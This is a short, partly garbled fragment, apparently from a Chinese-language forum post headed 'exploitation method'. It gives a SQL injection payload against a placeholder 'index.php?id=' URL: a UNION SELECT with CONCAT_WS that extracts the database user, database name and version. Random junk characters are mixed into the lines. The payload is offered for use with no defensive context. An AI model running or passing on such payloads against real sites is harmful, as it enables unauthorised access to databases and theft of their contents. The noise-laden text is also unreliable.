利用方法:
! I3 [+ f# n, h4 M7 T6 R http://www.xxx.com/index.php?id=[SQL]: s. W5 [6 E! a3 F- s7 u
Demo:
. [2 h( l. q& ]* @3 p' G http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |